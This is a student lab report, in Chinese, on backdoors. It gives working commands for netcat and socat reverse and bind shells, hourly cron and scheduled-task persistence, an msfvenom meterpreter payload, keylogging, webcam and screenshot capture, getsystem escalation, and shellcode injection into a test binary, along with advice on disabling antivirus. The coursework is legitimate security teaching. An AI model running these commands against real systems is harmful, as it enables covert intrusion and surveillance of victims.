20175122邱昕网络对抗技术exp2后门的原理与实践

前言

这期实验本来早就做完了，一直存着截图懒得写博客，今天有点动力写一写，也是一种复习吧

实验内容

1、使用netcat获取主机操作Shell，cron启动 (0.5分)

2、使用socat获取主机操作Shell, 任务计划启动 (0.5分)

3、使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

4、使用MSF meterpreter（或其他软件）生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权 (2分)

5、可选加分内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell(1分）加分内容一并写入本实验报告。

常用工具学习

netcat——是一个底层工具，进行基本的TCP、UDP数据收发。常被与其他工具结合使用，起到后门的作netcat常用命令可用netcat.exe -help查看帮助文档


  -4                         Use IPv4 only
  -6                         Use IPv6 only
  -C, --crlf                 Use CRLF for EOL sequence
  -c, --sh-exec <command>    Executes the given command via /bin/sh
  -e, --exec <command>       Executes the given command
      --lua-exec <filename>  Executes the given Lua script
  -g hop1[,hop2,...]         Loose source routing hop points (8 max)
  -G <n>                     Loose source routing hop pointer (4, 8, 12, ...)
  -m, --max-conns <n>        Maximum <n> simultaneous connections
  -h, --help                 Display this help screen
  -d, --delay <time>         Wait between read/writes
  -o, --output <filename>    Dump session data to a file
  -x, --hex-dump <filename>  Dump session data as hex to a file
  -i, --idle-timeout <time>  Idle read/write timeout
  -p, --source-port port     Specify source port to use
  -s, --source addr          Specify source address to use (doesn't affect -l)
  -l, --listen               Bind and listen for incoming connections
  -k, --keep-open            Accept multiple connections in listen mode
  -n, --nodns                Do not resolve hostnames via DNS
  -t, --telnet               Answer Telnet negotiations
  -u, --udp                  Use UDP instead of default TCP
      --sctp                 Use SCTP instead of default TCP

1.使用netcat获取主机操作Shell，cron启动

1.1windows获得linux shell    
从老师给的链接下载netcat
     linux的软件准备ufw防火墙的安装



    关闭防火墙360杀毒软件 主机和linux的都要关，linux先获取root权限再ufw disable（吐槽一下一定要记得关360，我第一次忘记关了他把我后门程序删了）


   ipconfig查看主机ip，ip add查看linux ip
   

（懒得截图了，关闭linux防火墙和查看linux ip 同一张图了）linux ip为192.168.81.130


    进入ncat.exe所在文件夹，并执行ncat.exe -l -p 5122，linux端用nc 192.168.81.1 5122 -e /bin/sh




这张图片我发现我忘记截linux端的了，2张图片都放上来吧，写博客的时候又重新做了一遍，以后还是边写博客边做吧

1.2linux获得windows shell

linux端打开监听nc -l -p 5122
windows端反弹连接linux



平民没有mac做不了mac相关实验

1.3netcat传输数据

Windows下监听5215端口，ncat.exe -l 5122
kali反弹连接到Windows的5215端口，nc 192.168.81.130 5122



连接建立成功，双方可以相互传输数据

1.4nc传输文件

kali 反弹连接到Windows5122端口，nc 192.168.81.1 5122 < file1.in

Windows端监听5122端口，并把收到的数据保存到file5122.out中，ncat.exe -l 5122 > file1.out

1.5cron启动

windows端先监听ncat.exe -l -p 5122

linux端使用crontab -e，选择3

在跳出的界面中最后一行加上13 * * * * /bin/netcat 192.168.81.1 5122 -e /bin/sh，意思是是在每个小时的第13分钟反向连接Windows主机让其能够执行Shell功能。

esc后：wq强制保存退出




这里有个问题我ls不成功，whoami弹出root，最后是使用ip add的

2.使用socat获取主机操作Shell, 任务计划启动

在老师给的链接中下载socat.exe文件

win+r输入compmgmt.msc

创建任务，创建触发器，新建操作





需要注意的是新建操作，操作为启动socat.exe程序，参数填写tcp-listen:5122 exec:cmd.exe,pty,stderr
到时间自动弹出

在linux中输入socat - tcp:192.168.811:5122

成功

3.使用MSF meterpreter（或其他软件）生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

先在linux端生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.81.130 LPORT=5122 -f exe > 5122backdoor.exe这里使用linux ip地址，因为是linux端控制windows端

windows端输入ncat.exe -l 5122 > 5122backdoor.exe
linux端输入nc 192.168.81.1 5122 < 5122backdoor.exe

就是这里360把我后门给删了，只能关了360再传一遍

linux端使用msfconsole进入msf控制台，使用监听模块，设置payload，设置反弹回连的IP和端口

然后exploit开始监听，windows端运行后门程序，黑客开始了

4.使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容，并尝试提权

用record_mid截获音频


用webcam_snap摄像头照相（我电脑摄像头坏的，不知道驱动程序坏的还是怎么回事）

用screenshot截屏



用keyscan_start记录下击键的过程，用keyscan_dump读取击键的记录

用getuid查看当前用户，getsystem提权
5、可选加分内容：使用MSF生成shellcode,注入到实践1中的pwn1中，获取反弹连接Shell


注入前的准备工作，以下步骤参考实验1和本实验的任务3
execstack -s pwn1  设置堆栈可执行
execstack -q pwn1  查询文件的堆栈是否可执行，显示X pwn1则表示可执行
echo "0" > /proc/sys/kernel/randomize_va_space  关闭地址随机化
more /proc/sys/kernel/randomize_va_space   查看随机化是否关闭，如显示0则已关闭，2未关闭

访问相关网站得到shellcode，通过实验一知我的shellcode起始地址为0xffffd6f0，把地址加在这段shellcode前面，在kali中用其生成pwn1文件。
perl -e 'print "A" x 32;print"xf0xd6xffxffx31xc0x31xdbx31xc9x31xd2x66xb8x67x01xb3x02xb1x01xcdx80x89xc3xb8x80xffxffxfex83xf0xffx50x66x68
x11x5cx66x6ax02x89xe1xb2x10x31xc0x66xb8x6ax01xcdx80x85xc0x75x24x31xc9xb1x02x31xc0xb0x3fxcdx80x49x79xf9x31xc0x50x68x2fx2fx73x68x68
x2fx62x69x6ex89xe3x31xc9x31xd2xb0x0bxcdx80xb3x01x31xc0xb0x01xcdx80"' > pwn1这段代码是的ip地址是127.0.0.1的，端口为4444，因此要设置一遍ip地址和端口号


连接成功

6..基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

自己见一个游戏网站，在游戏中植入后门程序，诱导玩家下载

(2)例举你知道的后门如何启动起来(win及linux)的方式？

windows：自启动，伪装成windows的服务诱使windows自己启动

linux：Crontab和注入shellcode

(3)Meterpreter有哪些给你映像深刻的功能？

直接生成后门程序，不需要自己编程，简单快捷，但实用性差，只能用于没有任何防火墙安全软件的电脑

(4)如何发现自己有系统有没有被安装后门？

监控开机自启动，网络连接，服务等，安装杀毒软件，及时更新病毒库，常扫描电脑杀毒

7.实验总结与体会